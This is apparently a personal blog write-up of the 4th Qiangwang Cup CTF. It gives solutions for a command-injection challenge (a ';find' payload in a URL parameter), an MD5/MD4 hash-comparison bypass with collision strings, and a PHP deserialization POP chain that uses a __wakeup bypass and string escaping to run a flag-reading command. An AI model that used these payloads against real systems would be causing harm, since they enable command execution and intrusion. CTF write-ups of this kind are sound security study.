前言

从第二届强网杯的机会接触安全,到现在的第四节强网杯,我接触安全也有两年多的时间,虽然这两年的每一天看起来都没怎么进步,但是这两年总的看起来,发现我原来已经学了这么多东西,简直不可思议,我都无法想象我已经变得有点东西了呢。嘿嘿

1598179228818



签到

image-20200824021903784



flag值: flag{welcome_to_qwb_S4}



主动

image-20200823185423801

打开链接发现源码

image-20200823185526284

通过源码可以知道,只要get方法传 ip 参数可以 ping 传入的值,并且有正则过滤flag不区分大小写

很明显是一道命令执行,可以用西面的字符来进行截断

&
;
|
$
`
||

先找到flag,因为过滤了flag可以用 星号(*)、问好(?)、字符或变量拼接。然后使用find命令找

http://39.96.23.228:10002/?ip=1.1.1.1;find%20/%20-name%20fla*

image-20200823190132760

可以用cat命令查看flag,因为有html标签所以需要在html源码里找flag

image-20200823190258377



flag值: flag{I_like_qwb_web}



upload

打开附件后发现有个流量包,是个杂项题

image-20200823190626425

通过tcp追踪发现上传了一个图片

image-20200823190819238

把原始数据复制出来,放到notepad++

image-20200823191107990

先去掉多余的换行

image-20200823191211271

然后找到0d0a0d0affd8,把ffd8前面的全部删掉,ffd8是jpg的文件头,然后复制全部

image-20200823191256473

在010工具里,新建文件,然后选择从16进制字符串粘贴

image-20200823191445388

保存

image-20200823191543034

这里发现steghide, steghide是个工具吗 可以试一下

image-20200823192856821

发现需要密码,随便试了一下123456就成功了

image-20200823193123055



flag值: flag{te11_me_y0u_like_it}



Funhash

image-20200823193422218

通过源码可以看到,需要传进的值和值的md4一样,这里可以用0e来绕过,因为不是强类型。这里我写了个脚本但是跑了好久没跑出来

# -*- coding: utf-8 -*-
from subprocess import PIPE,Popen
import multiprocessing
import random
import sys
import re

CHARS = "0123456789"
size = 32

def cmp_md5(substr, stop_event, str_len, start=0, size=20):
    while not stop_event.is_set():

        # 随机的字符串
        rnds = ''.join(random.choice(CHARS) for _ in range(size))

        # 加上固定的头部 0e
        value = '0e'+rnds

        # 调用php的 md4 函数
        md5 = Popen(r'C:\phpstudy_pro\Extensions\php\php7.3.4nts\php.exe C:\phpstudy_pro\WWW\aa\html\aaa.php '+value,stdout=PIPE, stderr=PIPE)
        output = md5.communicate()[0].decode()

        if re.findall('^\d*$', output[2:]):
            print(output[2:])

            if output[start:str_len] == substr:
                print(rnds+ "=>" + value+"=>"+ output  + "\n")
                stop_event.set()


if __name__ == '__main__':
    # 匹配的字符串并去掉首位的空格
    #substr = sys.argv[1].strip()
    substr = "0e"

    # 开始的位置
    #start_pos = int(sys.argv[2]) if len(sys.argv) > 1 else 0
    start_pos = 0

    # 结尾的位置
    str_len = len(substr) + start_pos

    # 相当于有多少线程
    cpus = multiprocessing.cpu_count()
    cpus = 5

    stop_event = multiprocessing.Event()
    processes = [multiprocessing.Process(target=cmp_md5, args=(substr,
                                         stop_event, str_len, start_pos))
                 for i in range(cpus)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()

aaa.php

<?php 
echo hash("md4", $argv[1]);

然后我就从网上搜到了一个 https://medium.com/@sbasu7241/hsctf-6-ctf-writeups-a807f0b25ae4

#!/usr/bin/env python
import hashlib
import Crypto.Hash.MD4
import re
prefix = '0e'
def breakit():
    iters = 0
    while 1:
        s  = (prefix + str(iters)).encode('utf-8')
        hashed_s = hashlib.new('md4', s).hexdigest()
        iters = iters + 1
        r = re.match('^0e[0-9]{30}', hashed_s)
        if r:
            print ("[+] found! md4( {} ) ---> {}".format(s, hashed_s))
            print ("[+] in {} iterations".format(iters))
            exit(0)
        if iters % 1000000 == 0:
            print ("[+] current value: {}       {} iterations, continue...".format(s, iters))
breakit()

image-20200823193830331

级别二,之前做ctf时候遇到过不同值md5相同 https://blog.csdn.net/qq_42967398/article/details/104522626

<?php

$s1 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab";
$s2 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%5f%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%f3%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%e9%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%13%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%a8%1b%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%39%05%39%95%ab";
$s3 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%16%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%33%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab";
var_dump(md5(urldecode($s1)));
var_dump(md5(urldecode($s2)));
var_dump(md5(urldecode($s3)));

// 结果
# string(32) "ea8b4156874b91a4ef00c5ca3e4a4a34"
# string(32) "ea8b4156874b91a4ef00c5ca3e4a4a34"
# string(32) "ea8b4156874b91a4ef00c5ca3e4a4a34"

级别三,直接百度搜索就发现了 https://blog.csdn.net/March97/article/details/81222922, 只要用md5($password,true)这个函数加密出来的是 or ‘数字,就会返回true

image-20200823194722753

image-20200823194825181

所以最后的payload是

http://39.101.177.96/
?hash1=0e251288019
&hash2=%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab
&hash3=%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%16%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%33%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab
&hash4=129581926211651571912466741651878684928

image-20200823195048229



flag值: flag{y0u_w1ll_l1ke_h4sh}



web辅助

image-20200823195310144

首先读懂源码,我全部加上了注释,一共有四个文件,index.php

<?php
@error_reporting(0);
require_once "common.php";
require_once "class.php";

# 检查 username 和 password 是否有传入的值。
if (isset($_GET['username']) && isset($_GET['password'])){
    $username = $_GET['username'];
    $password = $_GET['password'];

    # 创建一个新的player类,传入username和password值
    $player = new player($username, $password);

    # 把$playes序列化,保存到caches下的$_SERVER['REMOTE_ADDR']md5值文件中, 保存前对$playes进行序列化。
    file_put_contents("caches/".md5($_SERVER['REMOTE_ADDR']), write(serialize($player))); 

    # 输出名字和当前的源ip
    echo sprintf('Welcome %s, your ip is %s\n', $username, $_SERVER['REMOTE_ADDR']);
}
else{
    echo "Please input the username or password!\n";
}

?>

common.php

<?php
function read($data){
    # \0*\0 转换成 chr(0)."*".chr(0)
    $data = str_replace('\0*\0', chr(0)."*".chr(0), $data);
    return $data;
}
function write($data){
    # 把chr(0)."*".chr(0),转换成 \0*\0
    $data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);
    return $data;
}

function check($data)
{
    // 不允许出现name字符串
    if(stristr($data, 'name')!==False){
        die("Name Pass\n");
    }
    else{
        return $data;
    }
}
?>

class.php

<?php
class player{
    protected $user;
    protected $pass;
    protected $admin;

    public function __construct($user, $pass, $admin = 0){
        # 构造函数定,admin默认值是0
        $this->user = $user;
        $this->pass = $pass;
        $this->admin = $admin;
    }

    public function get_admin(){
        # 调用这个函数是会返回类中的admin变量
        return $this->admin;
    }
}

class topsolo{
    protected $name;

    public function __construct($name = 'Riven'){
        $this->name = $name;
    }

    public function TP(){
        # 判断类中name变量是不是函数或类,如果是就执行他
        if (gettype($this->name) === "function" or gettype($this->name) === "object"){
            $name = $this->name;
            $name();
        }
    }

    public function __destruct(){
        # 析构函数,当类结束时,执行类中的TP函数
        $this->TP();
    }

}

class midsolo{
    protected $name;

    public function __construct($name){
        $this->name = $name;
    }

    public function __wakeup(){
        # 当该给被反序列化时执行此函数,判断name变量的值是不是Yasuo,不是重新赋值为Yasuo,并输出。
        if ($this->name !== 'Yasuo'){
            $this->name = 'Yasuo';
            echo "No Yasuo! No Soul!\n";
        }
    }


    public function __invoke(){
        # 当有函数执行时,执行Gank函数
        $this->Gank();
    }

    public function Gank(){
        # 判断 name 中是否有 Yasuo字符串
        if (stristr($this->name, 'Yasuo')){
            echo "Are you orphan?\n";
        }
        else{
            echo "Must Be Yasuo!\n";
        }
    }
}

class jungle{
    protected $name = "";

    public function __construct($name = "Lee Sin"){
        $this->name = $name;
    }

    public function KS(){
        # 输出 flag
        system("cat /flag");
    }

    public function __toString(){
        # 当类被当成字符串使用时,执行KS函数
        $this->KS();  
        return "";  
    }

}
?>

play.php

<?php
@error_reporting(0);
require_once "common.php";
require_once "class.php";

# 读取序列化文件
@$player = unserialize(read(check(file_get_contents("caches/".md5($_SERVER['REMOTE_ADDR'])))));
# 打印序列化后的返回值,下面的都无关紧要
print_r($player);
if ($player->get_admin() === 1){
    echo "FPX Champion\n";
}
else{
    echo "The Shy unstoppable\n";
}
?>

1、正常的访问流程,传入username和password, 通过两个值生成class.php文件里的player类,然后序列化通过common.php的write函数格式化,最后保存到/caches/下

image-20200823220050988

2、访问play.php,读取caches的序列化,然后经过common.php的check和read格式化,最后反序列化,把反序列化的结果打印出来,在判断是不是admin

image-20200823220556644

解题思路:

1、index.php 会接受两个传参,并且后面会反序列化,我们就可以构建一个序列化给他让他反序列化, 所以第一步先构建一个能读取flag的序列化

  • 可以看到 jungle 类,的 KS 函数会读取flag,触发的方法是类被当成字符串使用时会触发

    image-20200824001708355

  • 想要把jungle被当成字符串可以再 midsolo类的 Gank函数里有用stristr 来判断字符串里是否包含另一个字符串,调用Gank的方法是 __invoke魔法函数(需要有其他函数执行时该函数才会执行)

    image-20200824002349367

  • 想要有其他函数执行,可以在 topsolo类的TP函数里找到,只要传进来的name是函数或类就执行,TP函数执行的方法是,__destruct魔法函数(在类结束时执行,析构函数),

  • 这是一个完整的pop链就构造好了,在class.php的结尾加上如下语句,因为我电脑windows没有/flag,只能echo一个11111来表示flag

   new topsolo(new midsolo(new jungle));

image-20200824004014097

  • 在浏览器访问class.php发现已经成功调用KS函数

    image-20200824004628801

  • 使用反序列化的时候发现并没有调用flag

require_once "common.php";

$a = new topsolo(new midsolo(new jungle));
$b = serialize($a);
echo "<br/>". write($b) ."<br/>";

unserialize($b);

image-20200824010510249

  • 因为在midsolo类中的魔法函数(__wakeup)是在反序列化时替换name变量,所以无法把jungle类当成字符串调用了

    image-20200824010749620

  • 这时我在网上找到了 CVE-2016-7124来绕过__wakeup,只要在反序列话的表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 => 链接

require_once "common.php";

$b = 'O:7:"topsolo":1:{s:7:"\0*\0name";O:7:"midsolo":2:{s:7:"\0*\0name";O:6:"jungle":1:{s:7:"\0*\0name";s:7:"Lee Sin";}}}';
$b = read($b);

unserialize($b);
echo "<br/><br/>";

image-20200824011239740

image-20200824011511159

  • 当正式用的时候还会有common.php文件中的check来过滤name字符串,如果序列化里包含了name就无法反序列化

require_once "common.php";

$b = file_get_contents("caches/".md5($_SERVER['REMOTE_ADDR']));
$b = read(check($b));

unserialize($b);
echo "<br/><br/>";

image-20200824012200288

image-20200824012210974

  • 我们需要16进制编码来绕过,并且类名的S需要大写
O:7:"topsolo":1:{S:7:"\0*\0nam\65";O:7:"midsolo":2:{S:7:"\0*\0nam\65";O:6:"jungle":1:{S:7:"\0*\0nam\65";s:7:"Lee Sin";}}}

image-20200824012705685

  • 但是player类序列化只有三个对象属性,所以我们需要用反序列化字符逃逸 => 链接, 因为read函数会把5个字符串格式化成3个字符串,所以他就会吃掉后面两个字符

  • 我们需要把蓝色的部分吃掉,因为多了两个斜线所以长度是22

    image-20200824014602193

  • 所以就需要11组\0*\0,最后还要在之前序列化前面加上变量名;s:7:"\0*\0pass";所以最后的payload

http://192.168.121.1/aa/html/
?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0
&password=;s:7:"\0*\0pass";O:7:"topsolo":1:{S:7:"\0*\0nam\65";O:7:"midsolo":2:{S:7:"\0*\0nam\65";O:6:"jungle":1:{S:7:"\0*\0nam\65";s:7:"Lee Sin";}}}

image-20200824020136358

  • 找到了一个很像这道题的ctf => 链接
  • 期间找到的一些关于反序列化漏洞思路 => 链接 链接 链接



flag值:flag{a5e9e444-29ef-4549-a61f-530e880b56a1}



miscstudy

这道题没做完,一共七关卡到了第二关。

  • 打开流量包,过滤http选择第二个,双击这个蓝色的链接

    image-20200824020633497

  • 得到flag的第一部分,和wireshark解密ssl的文件

image-20200824020818742

  • 把刚才网页里的内容保存到文件里,并在wireshark导入

    image-20200824020907941

  • 然后再次查看就能看到访问了一个图片,图片下载下来后就卡主了不知道怎么做了

    image-20200824020953240



最后的名次

image-20200824021326728





0
最后修改日期:2020年8月25日

留言

作者

这次玩的很开心

0

zhr进行回复 取消回复

发布留言必须填写的电子邮件地址不会公开。